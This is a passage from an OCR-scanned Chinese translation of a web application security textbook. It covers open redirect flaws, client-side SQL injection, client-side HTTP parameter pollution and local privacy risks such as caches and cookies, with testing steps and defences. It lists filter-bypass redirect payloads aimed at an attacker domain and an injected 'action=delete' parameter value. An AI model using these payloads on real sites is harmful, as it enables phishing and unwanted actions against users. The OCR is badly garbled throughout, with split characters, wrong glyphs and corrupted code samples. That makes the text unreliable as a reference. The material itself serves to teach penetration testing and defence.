情况 ， 而 且 适 用 于 匿名 用 户 首 次 提交 个 人 或 其 他 敏感 信息 时 。 

为 进一步 防止 会 话 固定 攻击 ， 一 些 安全 性 至 关 重 要 的 应 用 程序 采用 
每 页 面 令 牌 来 强化 主 会 话 令 牌 ， 以 提供 深层 防御 。 这 种 技巧 可 以 击 退 大 
多 数 会 话 劫持 攻击 ， 请 参阅 第 7 章 了解 详 情 。 

应 用 程序 不 得 接受 它 认 为 不 是 自己 发 布 的 任意 会 话 令 牌 。 应 立即 在 
浏览 器 中 取消 该 令 牌 ， 并 将 用 户 返 回 到 应 用 程序 的 起 始 页 面 。 






































如 果 应 用 程序 提取 用 户 可 控制 的 输入 ， 并 使 用 这 个 数据 执行 重 定 
回 ， 指 示 用 户 的 浏览 器 访问 不 同 于 用 户 所 请 求 的 URL， 这 时 就 会 导致 开 
放 重 定向 漏洞 。 相 比 于 可 执行 大 量 恶意 操作 的 路 站 点 脚本 漏洞 ， 攻 击 者 
通常 对 这 些 漏洞 不 太 感 兴趣 。 攻 击 者 主要 利用 开放 式 重 定 同 漏 洞 实 施 钓 
鱼 攻击 ， 诱 使 受害 者 访问 欺骗 性 Web 站 点 并 输入 敏感 信息 。 对 潜在 的 受 
害 者 而 言 ， 重 定 问 漏洞 提高 了 攻击 者 的 可 信 度 ， 因 为 它 允 许 攻击 者 创建 
一 个 指向 他 所 针对 的 可 信 Web 站 点 的 URL， 因 此 更 具有 说 服 力 ， 但 任何 
访问 这 个 URL 的 用 户 将 被 悄悄 重 定 加 到 攻击 者 控制 的 Web 站 点 。 

也 就 是 说 ， 现 实 志 界 中 的 大 多 数 钓鱼 攻击 都 使 用 其 他 技巧 来 获得 不 
受 所 针对 的 应 用 程序 控制 的 可 信和 度 。 这 类 技巧 包括 注册 类 似 的 域名 、 使 























用 官方 形式 的 子 域 ， 以 及 在 HTML 电子 邮件 中 在 定位 文本 与 链接 的 目标 
URL 之 间 造 成 不 匹配 。 研 究 表 明 ， 多 数 用 户 都 无 法 或 不 太 可 能 基于 URL 
结构 作出 安全 决策 。 因 此 ， 和 典型 的 开放 式 重 定 癌 漏洞 对 钓鱼 攻击 者 而 言 
并 无 多 大 价值 。 

近年 来 ， 开 放 式 重 定 问 漏洞 一 直 被 攻击 者 以 相对 良性 的 方式 加 以 利 
用 ， 用 于 实施 “ 瑞 克 摇摆 ”(rickrolling) 攻击 。 在 这 种 攻击 中 ， 受 害 者 在 
不 知情 的 情况 下 被 重 定向 到 英国 流行 乐 传奇 人 物 里 克 : 阿 斯 特 利 的 视 
频 ， 如 图 13-5 所 示 。 
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图 13-5 “Fim eR BCE IN aR 


1. 查找 并 利用 开放 式 重 定向 漏洞 

查找 重 定向 漏洞 的 第 一 步 是 确定 应 用 程序 中 的 所 有 重 定 向 。 应 用 程 
序 可 以 通过 几 种 方式 使 用 户 的 浏览 器 重 定向 到 不 同 的 URL。 

口 HITP 重 定向 使 用 一 条 状态 码 为 3xx 的 消息 与 一 个 指定 重 定向 目标 





的 Location 消 息 头 。 例 如 : 


HTTP/1.1 302 Object moved 
Location: http://mdsec.net/updates/update29.html 


DQ HTTP Refresh} k H] fE 企 固 定时 间 间 隔 后 使 用 任意 UREL 重 新 加 载 
某 个 页 面 ， 该 间隔 可 以 为 零 (0) ， 也 就 是 能 立即 触发 重 定向 。 例 如 : 
HTTP/1.1 200 OK 
Refresh: 0; url=http://mdsec.net/updates/update29-.html 


口 HITML<meta> 标 签 可 复制 任何 HITP 消 息 头 的 行为 ， 因 此 可 用 于 
EEE. Pun: 


HTTP/1.1 200 OK 
Content-Length: 125 


<html> 

<head> 

<meta http-equiv="refresh" content= 
"O;url=http://mdsec.net/updates/update29.html"> 
</head> 

</html> 


i 口 JavaScript 中 的 各 种 API 可 用 于 将 浏览 器 重 定 同 到 任意 URL。 例 
H: 


HTTP/1.1 200 OK 
Content-Length: 120 


<html> 

<head> 

<script> 

document .location="httpo://mdsec.net/updates/upåate29.html"; 
</script> 

</head> 

</html> 


以 上 这 些 方 法 可 用 于 指定 绝对 或 相对 URL。 





渗透 测试 步 又 


(1) 确定 应 用 程序 中 使 用 重 定向 的 所 有 位 置 。 

(2) 要 确定 所 有 重 定 癌 ， 一 个 有 效 的 方法 ， 是 使 用 拦截 代理 
服务 器 浏览 应 用 程序 ， 并 监控 访问 页 面 的 请 求 ( 与 其 他 资源 ， 如 图 
TR. EAR FAR PEE AIA) 。 

(3) 如 果 一 个 导航 操作 导致 了 几 个 连续 请 求 ， 应 分 析 它 使 用 
什么 方法 进行 重 定 问 。 


绝 大 多 数 的 重 定 同 都 不 受用 户 控 制 。 例 如 ， 在 典型 的 登录 机 制 中 ， 
回 /login.jsp 提 交 有 效 的 证 书 将 返回 一 个 指向 /myhome.jsp 的 HTTP 重 定 
人 
Hal 。 

但 是 ， 在 有 些 情 况 下 ， 有 用户 提 交 的 数据 以 某 种 方式 用 于 设置 重 定向 
的 目标 。 一 个 常见 的 例子 是 ， 应 用 程序 强制 使 会 话 已 经 终止 的 用 户 返 回 
登录 页 面 ， 然 后 在 用 户 重 新 成 功 通 过 验证 后 将 他 们 重 定 同 到 最 初 的 
URL。 如 采 遇 到 这 种 行为 ， 就 表明 应 用 程序 可 能 易于 受到 重 定 同 攻击 ， 
因此 ， 应 当 对 这 种 行为 进行 深入 分 析 ， 以 确定 它 是 否 可 被 攻击 者 利用 。 

















渗透 测试 步 又 


(1) 如果 用 户 数 据 在 包含 绝对 URL 的 重 定向 中 进行 处 理 ， 则 
nee 并 测试 应 用 程序 是 否 将 用 户 重 定 癌 到 男 一 个 
(2) 如 果 所 处 理 的 用 户 数据 包含 相对 URL， 应 将 此 URL 修 改 
Oo ee ae FP WU XE Fe eS ET] 22 
这 个 域 。 

(3) 无 论 是 哪 一 种 情况 ， 如 果 见 到 以 下 行为 ， 那 么 应 用 程序 
肯定 容易 受到 重 定 同 攻击 : 

GET /updates/8/?redir=http://mdattacker.net/ HTTP/1.1 

Host: mdsec.net 


HTTP/1.1 302 Object moved 
Location: http://mdattacker.net/ 


ALL yn vw) 

笑 试 访问 
http://mdsec.net/updates/8/ 
http://mdsec.net/updates/14/ 
http://mdsec.net/updates/18/ 


http://mdsec.net/updates/23/ 
http://mdsec.net/updates/48/ 


ey 


> 注解 ”如 果 应 用 程序 使 用 可 由 用 户 控 制 的 数据 指定 框架 的 
目标 URL， 这 时 会 发 生 一 种 与 重 定 癌 并 非 完全 相同 但 相似 现象 。 如 
果 可 以 构建 一 个 URL， 将 外 部 URL 的 内 容 加 载 到 子 框架 中 ， 就 可 以 
相当 隐秘 地 实施 重 定向 攻击 。 这 时 ， 可 以 使 用 其 他 内 容 仅 蔡 换 应 用 
程序 的 部 分 界面 ， 并 使 浏览 喜 地 址 栏 中 的 域 保 持 不 变 。 


以 下 情况 很 常见 ， 用户 控 制 的 数据 用 于 设置 重 定 同 的 目标 ， 但 却 被 
应 用 程序 以 菜 种 方式 过 滤 或 净化 掉 ， 以 阻止 重 定 辣 攻 击 。 这 时 并 没有 办 
法 确定 应 用 程序 是 否 易于 受到 攻击 ;因此 ， 接 下 来 应 该 探查 应 用 程序 采 
用 的 防御 机 制 ， 确 定 是 否 能 够 避 开 它们 以 执行 任意 重 定向 。 通 常会 遇 到 
以 下 两 种 防御 : 尝试 阻止 绝对 URL、 附加 一 个 特殊 的 绝对 URL 前 级 。 

9 HIE URL 

应 用 程序 可 能 会 检查 用 户 提 交 的 字符 串 是 否 以 http:/ 开 头 ， 如 果 
是 ， 就 阻止 该 请 求 。 这 时 ， 使 用 下 面 的 技巧 可 以 成 功 创建 一 个 指向 外 部 
Web 站 点 的 重 定向 〈 请 注意 第 三 行 开 头 的 空格 ) : 






































HtTp://mdattacker.net 
S00http: //mdattacker.net 
http: //mdattacker.net 
//mdattacker.net 
$68%74%74%70%3a%2f%2fmdattacker.net 
%2568%2574%2574%2570%253a%252 £252 fmdattacker.net 
ttps://mdattacker.net 
http: \\mdattacker.net 
http:///mdattacker.net 


另外 ， 应 用 程序 可 能 会 删除 http:// 及 任何 指定 的 外 部 域 ， 尝 试 净化 
绝对 URL。 这 时 ， 使 用 上 面 的 技巧 可 以 成 功 避 开 净化 ， 同 时 还 应 测试 下 
面 的 攻击 是 否 可 行 : 
http://http://mdattacker.net 
http://mdattacker.net/http://mdattacker.net 
hthttp://tp://mdattacker.net 
有 时 ， 应 用 程序 可 能 会 检验 用 户 提交 的 字符 串 是 否 以 指向 它 自 己 的 
域名 的 绝对 URL 开 头 ， 或 是 人 否 包 含 这 个 URL。 这 时 ， 下 面 的 攻击 可 能 


BM : 





http: //mdsec.net.mdattacker.net 
ttp://mdattacker.net/?http://mdsec.net 
http: //mdattacker.net/%$23http: //mdsec.net 


Al, yn vw) 

笑 试 访问 
http://mdsec.net/updates/52/ 
http://mdsec.net/updates/57/ 
http://mdsec.net/updates/59/ 


http://mdsec.net/updates/66/ 
http://mdsec.net/updates/69/ 


9 附加 绝对 前 绥 


应 用 程序 可 能 会 在 用 户 提 交 的 字符 串 前 附加 一 个 绝对 URL 前 级 ， 从 
而 建立 重 定 癌 的 目标 。 


GET /updates/72/?redir=/updates/update29. html HTTP/1.1 





Host: mdsec.net 


HTTP/1.1 302 Object moved 


Location: http://mdsec.net/updates/update29.html 


这 时 ， 我 们 无 法 确定 应 用 程序 是 人 否 易于 受到 攻击 。 如 果 所 使 用 的 前 
级 由 http:// 与 应 用 程序 的 域名 组 成 ， 但 在 域名 后 没有 和 斜 线 字符 ， 那 么 它 
就 易于 受到 攻击 。 例 如 ， 下 面 的 URL 
http://mdsec.net/updates/72/?redir=.mdattacker.net 
会 重 定 问 到 
http://mdsec.net.mdattacker.net 
它 由 攻击 者 控制 ， 前 提 是 攻击 者 控制 着 域 mdattacker.net 的 DNS 记 录 。 
然而 ， 如 果 绝 对 URL 前 级 确实 包含 和 斜 线 字符 O 或 服务 器 上 的 某 
个 子 目录 ， 那 么 应 用 程序 可 能 不 会 受到 针对 外 部 域 的 重 定向 攻击 。 这 
时 ， 攻 击 者 最 多 只 能 构建 一 个 URL， 将 用 户 重 定向 到 同一 应 用 程序 中 的 
男 一 个 URL。 通 常 ， 这 种 攻击 并 不 能 取得 任何 成 果 ， 因 为 如 果 攻 击 者 能 
够 诱 使 用 户 访问 应 用 程序 中 的 一 个 URL， 那 么 他 大 概 也 只 能 向 他 们 直接 
传送 另 一 个 URL。 




















Al, yn vw) 
笑 试 访问 
http://mdsec.net/updates/72/ 


如 果 使 用 从 DOM 中 和 碍 询 数据 的 客户 端 JavaScript 实 现 重 定向 ， 则 负 
贡 执 行 重 定 辐 与 相关 确认 的 所 有 代码 通 稼 将 在 客户 端 上 可 见 。 因 此 ， 应 
仔细 检查 这 些 代 码 ， 确 定 它 如 何 将 用 户 控 制 的 数据 合并 到 URL 中 ， 以 及 
它 是 否 执 行 了 任何 确认 ， 如 果 是 ， 是 否 有 什么 办 法 可 以 避 开 确认 。 注 
意 ， 和 基于 DOM 的 XSS 漏 洞 一 样 ， 在 将 脚本 返回 浏览 器 之 前 ， 服 务 器 可 
能 对 其 执行 了 其 他 确认 。 下 面 的 JavaScript APIP H FHT EE N): 
DQ document.location 
DQ document.URL 
口 document.open () 
口 window.location.href 
口 window.navigate () 
DQ window.open () 














Al, yn vw) 

笑 试 访问 
http://mdsec.net/updates/76/ 
http://mdsec.net/updates/79/ 
http://mdsec.net/updates/82/ 
http://mdsec.net/updates/91/ 
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2. 防止 开放 式 重 定 问 漏洞 

绝 不 将 用 户 提 交 的 数据 合并 到 重 定 问 目标 中 ， 是 避免 开放 式 章 定 问 
漏洞 的 最 有 效 方 法 。 开 发 者 这 样 做 出 于 各 种 原因 ， 但 通常 我 们 都 可 以 找 
到 酝 代办 法 。 例 如， 用 户 界 面 中 常常 包含 一 组 链接 ， 每 个 链接 指 癌 一 个 
重 定 问 页 面 ， 并 以 目标 URL 为 参数 。 这 时 ， 可 能 的 瞪 代 方法 如 下 。 

口 从 应 用 程序 中 删除 重 定向 页 面 ， 用 直接 指向 相关 目标 UREL 的 链接 
蔡 代 指 同 重 定 同 页 面 的 链接 。 

口 建立 一 个 包含 所 有 有 效 重 定向 URE 的 列表 。 不 以 参数 的 形式 向 重 
定 问 页 面 传送 目标 URL， 而 是 传送 这 个 列表 的 索引 。 重 定向 页 面 应 在 它 
的 列表 中 查询 这 个 索引 ， 并 返回 一 个 指 同 相关 URL 的 重 定 问 。 

如 果 重 定 疝 页 面 不 可 避免 地 要 收 到 用 户 提 交 的 输入 并 将 它 合并 到 重 
定 问 目标 中 ， 应 使 用 以 下 措施 降低 重 定 问 攻击 的 风险 。 

口 应 用 程序 应 在 所 有 章 定 癌 中 使 用 相对 URL， 重 定向 页 面 应 严格 确 
认 它 收 到 的 URL 为 相对 URL。 它 应 当 确 保 : 用 户 提 交 的 URL 或 者 以 其 后 
接 一 个 字母 的 斜 线 字 符 开 头 ， 或 者 以 一 个 字母 开头 ， 并 且 在 第 一 个 斜 线 
前 没有 冒号 。 应 拒绝 ， 而 不 是 净化 任何 其 他 输入 。 

口 应 用 程序 应 该 在 所 有 重 定 癌 中 使 用 相对 于 Web 根 目录 的 URL， 在 
发 布 重 定 问 之 前 ， 重 定向 页 面 应 在 所 有 用 户 提 交 的 URL 前 附加 
http://yourdomainname.com。 如 果 用 户 提 交 的 URL 并 不 以 斜 线 字符 开 
涉 ， 应 在 它 的 前 面 附加 http://yourdomainname.com/。 

口 应 用 程序 应 对 所 有 重 定向 使 用 绝对 URL， 重 定向 页 面 在 发 布 重 定 
向 之 前 ， 应 确认 用 户 提 交 的 URL 以 http:/yourdomainname.com/ 开 头 。 此 
外 ， 应 拒绝 任何 其 他 输入 。 

和 基于 DOM 的 XSS 漏 洞 一 样 ， 建 议 应 用 程序 不 要 根据 DOM 数 据 通 
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HTML5 文 持 客户 端 SQL 数 据 库 ， 应 用 程序 可 使 用 该 数据 库 在 客户 
端 存储 数据 。 palatial loa Mad cca aca 


var db openDatabase { ntactsdb', '1.0', ‘WahhMail contacts', 9000} ; 


db.transaction{function (tx) { 


应 用 程序 可 以 使 用 此 功能 将 常用 数据 存储 到 客户 端 ， 然 后 在 需要 时 
将 这 些 数据 快速 检索 到 用 户 界面 中 。 它 还 允许 应 用 程序 以 “离线 模式 ” 运 
行 ， 在 这 种 模式 下， 所 有 由 应 用 程序 处 理 的 数据 将 驻 留 在 客户 端 ， 用 户 
操作 也 存储 在 客户 端 ， 以 便 在 网 络 连 接 可 用 时 与 服务 器 进行 同步 。 

我 们 在 第 9 益 中 介 \ 绍 了 如 何在 服务 器 ; 前 SQL 数 据 库 中 实施 SQL 注 入 
攻击 ， 在 这 种 攻击 中 ， 攻 击 者 将 受 其 控制 的 数据 以 危险 的 方式 插入 SQL 
查询 中 。 实 际 上 ， 在 客户 端 也 可 能 发 和 后 此 类 攻击 。 下 面 列 出 了 一 些 可 能 
受到 这 种 攻击 的 应 用 程序 。 

口 社 交 网 络 应 用 程序 ， 这 类 应 用 程序 将 用 户 的 联系 人 信息 存储 在 本 
地 数据 库 中 ， 包 括 联 系 人 姓名 和 状态 更 新 。 

O 新闻 应 用 程序 ， 这 类 应 用 程序 将 文章 和 用 户 评论 存储 在 本 地 数据 
库 中 ， 以 便于 离线 查看 。 

口 web 邮件 应 用 程序 ， 这 类 应 用 程序 将 电子 邮件 存储 在 本 地 数据 库 
中 ， 在 离线 模式 下 运行 时 ， 则 存储 待 发 邮件 以 便于 稍 后 发 送 。 

在 这 些 情况 下 ， 攻 击 者 可 以 将 专门 设计 的 输入 包含 在 受 其 控制 的 一 
组 数据 中 《应 用 程序 在 本 地 存储 这 些 数据 ) ， 从 而 实施 客户 端 SQL 注入 
攻击 。 例 如 ， 通 过 发 送 一 封 电 子 邮 件 ， 并 在 主题 行 中 包含 SQL 注入 攻击 
代码 〈 如 果 这 些 数 据 能 入 在 客户 端 SQL 查询 中 ) ， 就 可 以 攻破 收 件 人 用 
户 的 本 地 数据 库 。 如 果 应 用 程序 以 危险 的 方式 使 用 本 地 数据 库 ， 就 可 能 
导致 严重 的 攻击 。 仅 仅 使 用 SQL 注入 ， 攻 击 者 就 可 以 从 数据 库 中 检索 用 
户 已 收 到 的 其 他 邮件 的 内 容 ， 将 这 些 数据 复制 到 发 送 给 攻击 者 的 待 发 电 
子 邮件 ， 然 后 将 该 电子 邮件 添加 到 已 排队 的 待 发 邮件 表 中 。 

通常 存储 在 本 地 数据 库 中 的 数据 类 型 可 能 为 SQL 元 字符 ， 如 单 引 
号 。 因 此 ， 在 正常 使 用 测试 期 间 即 可 确定 许多 SQL 注 入 漏 润 ， 从 而 实施 














针对 SQL 注入 攻击 的 防御 机 制 。 和 服务 器 端 注入 一 样 ， 这 些 防 御 机 制 也 
可 以 通过 各 种 方法 规避 ， 从 而 实施 成 功 的 攻击 。 





在 第 9 章 中 ， 我 们 介绍 了 如 何在 茶 些 情况 下 使 用 HITP 参 数 污染 攻击 
来 破坏 服务 器 端 应 用 程序 遇 辑 。 有 时 ， 这 些 攻击 也 可 以 在 客户 端 实施 。 
以 一 个 使 用 以 下 URL 加 载 收 件 箱 的 Web 邮 件 应 用 程序 为 例 : 


https://wahh-mail .com ow? fo lder=inboxsorder=downé&s =20&starte=1 


在 收 件 箱 中 ， 每 封 邮件 旁 显示 了 几 个 链接 ， 可 用 于 执行 删除 、 转 发 
和 回复 等 操作 。 a 回复 第 12 封 邮件 的 链接 如 下 : 


<a href="deactio older=inboxéo ee A 


这 些 链接 中 的 一 些 参数 将 被 复制 到 收 件 箱 URL 中 。 即 使 应 用 程序 能 
够 有 效 防 范 XSS 攻 击 ， 但 攻击 者 仍然 可 以 构建 一 个 URL， 使 用 在 这 些 链 
接 中 回 显 的 其 他 值 来 显示 收 件 箱 。 例 如 ， 攻 击 者 可 以 提供 以 下 参数 : 


start=1%26action=delete 


此 参数 包含 一 个 URL 编 码 的 & 字 符 ， 应 用 程序 服务 器 将 自动 对 该 字 
符 进行 解 查 。 传 速 给 应 用 程序 的 san 参 数 的 值 为 








如 果 应 用 程序 接受 这 个 无 效 值 并 仍然 显示 收 件 箱 ， 同 时 不 加 修改 地 
ee ee le 





“re *="Soact’ on?*o Ser= rboxsorder=do size=20Ssta~t=l1gaction=deletes 
mess2ge=_2ka on=rep_y&rnd=1935¢€1293é1 /A">resly</a> 
现在 ， 此 链接 包含 两 个 操作 参数 个 指定 delete，_ 个 指定 





reply。 和 标准 的 HTTP 参 数 污 染 一 样 ， 在 用 户 单 击 “ 回 复 ” 链 接 时 ， 应 用 
程序 的 行为 取决 于 它 如 何 处 理 重 复 的 参数 。 许 多 时 候 ， 应 用 程序 使 用 第 
一 个 值 ， 因 此 ， 用 户 将 在 不 知情 的 情况 下 删除 任何 其 尝试 回复 的 邮件 。 

请 注意 ， 在 本 示例 中 ， 用 于 执行 操作 的 链接 包含 一 个 rnd 参 数 ， 它 
实际 上 是 一 个 反 CSRF 令 牌 ， 以 防止 攻击 者 通过 标准 的 CSRF 攻 击 轻 松 诱 
发 这 些 操作 。 由 于 客户 端 HPP 攻 击 会 注入 由 应 用 程序 构建 的 现 有 链接 ， 
因此 该 反 CSRF 令 牌 将 以 正常 方式 进行 处 理 ， 因 而 无 法 阻止 攻击 。 

在 现实 世界 的 大 多 数 Web 邮 件 应 用 程序 中 ， 很 可 能 存在 更 多 可 供 利 
用 的 操作 ， 包 括 删除 所 有 邮件 、 转 发 单个 邮件 ， 以 及 创建 通用 的 邮件 转 
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需 的 参数 ， 甚 至 利用 本 站 重 定 癌 功能 ， 以 诱 使 用 户 执 行 正常 情况 下 受 肥 
CSRF 防 御 保护 的 复杂 操作 。 此 外 ， 攻 击 者 还 可 以 使 用 多 级 URL 编 码 ， 

在 一 个 URL 中 注入 几 个 攻击 。 在 这 种 情况 下 ， 当 用 户 答 试 阅读 邮件 时 ， 
将 执行 一 个 操作 ， 而 当 用 户 尝 试 返回 收 件 箱 时 ， 则 会 执行 男 一 个 操作 。 





13.5 ”本 地 隐私 了 


许多 用 户 从 共享 的 环境 中 访问 Web 应 用 程序 ， 这 时 ， 攻 击 者 可 直接 
访问 用 户 访 问 的 同一 台 计 算 机 。 在 这 种 情况 下 ， 如 果 应 用 程序 存在 漏 
洞 ， 它 们 的 用 户 残 易于 受到 一 系列 攻击 。 这 类 攻击 主要 针对 以 下 领域 。 





= 

wy 

=> 注解 应 用 程序 可 能 会 采用 各 种 机 制 在 用 户 的 计算 机 上 存 
储 敏感 信息 。 许 多 时 候 ， 为 测试 应 用 程序 是 否 采用 了 茶 种 存储 机 
制 ， 最 好 是 使 用 完全 “干净 ”的 浏览 器 ， 以 便于 接受 测试 的 应 用 程序 
存储 的 数据 不 会 丢失 在 已 存储 的 现 有 数据 中 。 要 做 到 这 一 点 ， 最 理 
想 的 方法 ， 是 使 用 包含 全 新 安装 的 操作 系统 和 任何 浏览 侣 的 虚拟 


机 。 

此 外 ， 在 东 些 操作 系统 上 ， 在 使 用 文件 系统 内 置 的 管理 器 时 ， 
包含 本 地 存储 数据 的 文件 和 文件 夹 在 默认 情况 下 可 能 处 于 隐藏 状 
态 。 为 确保 标识 所 有 相关 数据 ， 应 将 计算 机 配置 为 显示 所 有 隐藏 文 
件 和 操作 系统 文件 。 














13.5.1 持久 性 cookie 


一 些 应 用 程序 将 敏感 数据 保存 在 持久 性 cookie 中 ， 大 多 数 浏 览 器 将 
该 cookie 存 放 在 本 地 文件 系统 上 。 


渗透 测试 步 又 


(1) 检查 应 用 程序 解析 过 程 中 《请 参阅 第 4 章 了 解 相关 内 容 ) 
确定 的 所 有 cookie。 如 果 发 现 有 任何 Set-cookie 指 令 包 含 将 来 日 期 的 
expires 属 性 ， 那 么 浏览 器 会 将 相关 cookie 保 存 到 这 个 日 期 。 例 如 : 


UID=4475dfc6eccca72d0e expires=Fri, 10-Aug-18 16:08:29 GMT; 


(2) 如 果 某 个 持久 性 cookie 中 包含 任何 敏感 数据 ， 本 地 攻击 者 
就 能 够 截获 这 些 数据 。 即 使 持久 性 cookie 中 包含 的 是 加 密 值 ， 但 如 
果 这 个 值 发 挥 着 非常 关键 的 作用 《如 不 需 用 户 输入 证 书 即 可 重新 验 
证 其 喘 份 )， 则 截获 这 个 值 的 攻击 者 根本 不 用 破译 它 的 内 容 ， 束 可 
以 将 它 重 新 提交 给 应 用 程序 请 参阅 第 6 章 了 解 相关 内 容 〉。 























尝试 访问 


http://mdsec.net/auth/227/ 


13.5.2 ”组 在 Web 内 容 


大 多 数 浏览 器 将 非 SSL Web 内 容 保存 在 缓存 中 ， 除 非 Web 站 点 特别 
指示 不 要 这 样 做 。 绥 存 数 据 一 般 保 存在 本 地 文件 系统 中 。 





渗透 测试 步 又 


(1) 对 于 任何 通过 HTTP 访 问 和 包含 敏感 数据 的 应 用 程序 页 
面 ， 应 检查 服务 器 响应 的 内 容 ， 确 定 所 有 缓存 指令 

(2) 下 面 的 指令 可 阻止 浏览 器 缓存 某 个 页 面 。 注 意 ， 这 些 指 
令 可 以 在 HTTP 响 应 消息 头 或 HTML 元 标签 中 指定 。 


Expires: 0 
Cache-control: no-cache 
Pragma: no-cache 


(3) BN ALAS BRIE BERS 令 ， 相 关 页 面 很 可 能 会 被 一 个 或 几 个 
浏览 器 缓存 。 注 意 ， 每 个 页 面 都 会 执行 缓存 指令 ， 因 此 必须 检查 每 
一 个 基于 HTTP 的 敏感 页 面 。 

(4) 为 确保 缓存 敏感 信息 ， 应 使 用 一 个 默认 安装 的 标准 浏览 
器 ， 如 Internet Explorer 或 Firefox。 在 浏览 器 的 配置 中 ， 完 全 清除 它 
的 缓存 和 全 部 cookie， 然 后 访问 包含 敏感 数据 的 应 用 程序 页 面 。 检 
得 出 现在 缓存 中 的 文件 ， 看 其 中 是 否 包 含 敏感 数据 。 如 果 有 大 量 文 
件 生成 ， 可 以 从 页 面 的 源 代码 中 提取 一 个 特殊 的 字符 串 ， 并 在 绥 存 
中 搜索 该 字符 串 。 

第 用 浏览 器 的 默认 缓存 位 置 如 下 。 

口 Internet Explorer C:\Documents and Settings\ 用 户 名 \Local 
Settings\Temporary Internet Files\Content.IE5 的 子 目 录 。 

注意 ， 在 Windows Explorer 中 ， 要 查看 这 个 文件 来， 
必须 输入 准确 的 路 径 并 显示 隐藏 的 文件 来 ， 或 通过 命 
令 行 浏 览 至 这 个 文件 夹 。 

O Firefox (Windows 中 ) C:\Documents and Settings\ 用 户 名 
\Local Settings\Application DataMozilla\Firefox\Profiles\ 配 置 文 件 名 
\Cache. 

O Firefox (Linux ) 
名 /Cache。 
































~/.mozillayfirefox/ 配 置 文件 





尝试 访问 


http://mdsec.net/auth/249/ 





许多 浏览 器 都 保存 有 浏览 历史 记录 ， 其 中 可 能 包含 通过 URL 参 数 传 
送 的 任何 敏感 数据 。 


渗透 测试 步 又 


(1) 确定 应 用 程序 中 通过 URL 参 数 传 送 敏 感 数 据 的 任何 情 
况 。 

(2) 如 果 存 在 这 样 的 情况 ， 应 检查 浏览 器 的 历史 记录 ， 证 实 
这 些 数 据 已 经 保存 在 那里 。 


尝试 访问 


http://mdsec.net/auth/90/ 


13.5.4 动 完 成 


许多 浏览 器 对 基于 文本 的 输入 字段 执行 一 项 可 由 用 户 配 置 的 自动 完 
成 功能 ， 这 些 字 段 可 保存 诸如 信用 卡号 码 、 用 户 名 与 密码 之 类 的 敏感 数 
oa Explorer 与 Firefox 分 别 将 自动 完成 数据 保存 在 注册 表 与 文件 
”如 前 所 述 ， 除 可 被 本 地 攻击 者 访问 外 ， 在 某 些 情况 下 ， 保 存在 自动 
完成 缓存 中 的 数据 也 可 通过 XSS 攻 击 获 取 。 





渗透 测试 步 又 


(1) 检查 可 从 其 文本 字段 中 获取 敏感 数据 的 任何 表单 的 
HTML 源 代码 。 

D 如 果 没 有 在 表单 标签 或 输入 字段 的 标签 中 设置 
autocomplete=off 属 性 ， 输 入 的 数据 将 保存 在 已 启用 自动 完成 的 浏览 
器 中 。 








尝试 访问 


http://mdsec.net/auth/260/ 





13.5.5 Flash 本 地 共享 对 象 


Flash 浏 览 器 扩 已 上 自己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 本 地 共 
享 对 象 (LSO) ， 也 称 为 Flash cookie. IREE BARIA, 存储 在 
LSO AZ AR 只 是 这 些 浏 览 器 安装 了 Flash 
六 展 。 





渗透 测试 步 又 


G) 有 一 些 用 于 Firefox 的 插件 〈 如 BetterPrivacy) 可 浏览 由 个 
体 应 用 程序 创建 的 LSO 数 据 。 
(2) 可 以 直接 碍 看 磁盘 上 的 原始 LSO 数 据 的 内 容 。 这 些 数据 
的 位 置 因 浏览 器 和 操作 系统 而 异 。 例 如 ， 对 于 最 新 版 本 的 Internet 
Explorer，LSO 数 据 位 于 以 下 文件 夹 中 : 
C:NUsers\{ 用 户 名 人 AppData\RoamingNMacromedia\Flash 
Player#SharedObjects\{ 随 机 攻 { 域 名 作 { 存 储 名 SWF 文件 名 } 





尝试 访问 


http://mdsec.net/auth/245/ 





Silverlight 浏 览 右 扩展 实施 自己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 
Silverlight 独 立 存 储 。 


渗透 测试 步 又 


可 以 直接 查看 磁盘 上 的 原始 Silverlight 独 立 存 储 数 据 的 内 容 。 
对 于 最 新 版 本 的 Internet Explorer， 这 些 数 据 存储 在 以 下 位 置 的 一 系 
列 多 层 散 套 、 随 机 命名 的 文件 夹 中 : 

C:\Users\{ Hd F' 4 }\AppData\LocalLow\Microsoft\Silverlight\ 


尝试 访问 


http://mdsec.net/auth/239/ 


13.5.7 Internet Explorer userData 
Internet Explorer 实 施 自 己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 


userData. 


渗透 测试 步 又 


可 以 直接 查看 存储 磁盘 上 IE 的 userData 中 的 原始 数据 的 内 容 。 
对 于 最 新 版 本 的 Internet Explorer， 这 些 数 据 位 于 以 下 文件 夹 中 : 

C:\Users\user\AppData\Roaming\Microsoft\Internet 
Explorer\UserData\Low\{ [i HL} 





尝试 访问 


http://mdsec.net/auth/232/ 


13.5.8 HTML5 本 + l | 


HTML5 正 引入 一 系列 新 的 本 地 存储 机 制 ， 它 们 包括 : 

口 会话 存 储 ; 

口 本 地 存储 ; 

口 数据 库存 储 。 

这 些 机 制 的 规范 和 用 法 仍 在 开发 阶段 。 并 非 所 有 浏览 器 都 实施 了 所 
有 这 些 机 制 ， 测 试 其 用 法 及 查看 存储 的 任何 数据 的 方式 因 浏 览 器 而 异 。 


13.5.9 ”防止 本 地 [隐私 了 


即使 敏感 数据 经 过 加 密 ， 应 用 程序 也 应 避免 将 其 保存 在 持久 性 
cookie 中 。 因 为 截获 这 些 数据 的 攻击 者 可 重新 将 其 提交 给 应 用 程序 。 

应 用 程序 应 使 用 适当 的 缓存 指令 防止 浏览 器 保存 敏感 数据 。 在 ASP 
应 用 程序 中 ， 下 面 的 指示 将 在 服务 器 中 包含 必要 的 指令 : 


<% Response.CacheControl = "no-cache" %> 
<% Response.AddHeader "Pragma", "no-cache" %> 
<% Response.Expires = 0 %> 

在 Java 应 用 程序 中 ， 可 使 用 以 下 命令 达到 相同 的 目的 : 
<% 
response. setHeader ({"Cache-Control", “no-cache") ; 
response. setHeader("Pragma", “no-cache") ; 
response.setDateHeader ({"Expires", 0); 
$> 


应 用 程序 决 不 能 使 用 URL 传 送 敏 感 数 据 ， 因 为 有 许多 位 置 都 可 能 记 


录 这 些 URL。 应 用 程序 应 使 用 通过 POST 方法 提交 的 HIML 表 单传 送 所 
有 这 些 数据 。 

任何 时 候 ， 如 果 用 户 在 文本 输入 字段 中 填 入 敏感 数据 ， 都 应 在 表单 
或 字段 标签 中 指定 autocomplete=off 属 性 。 

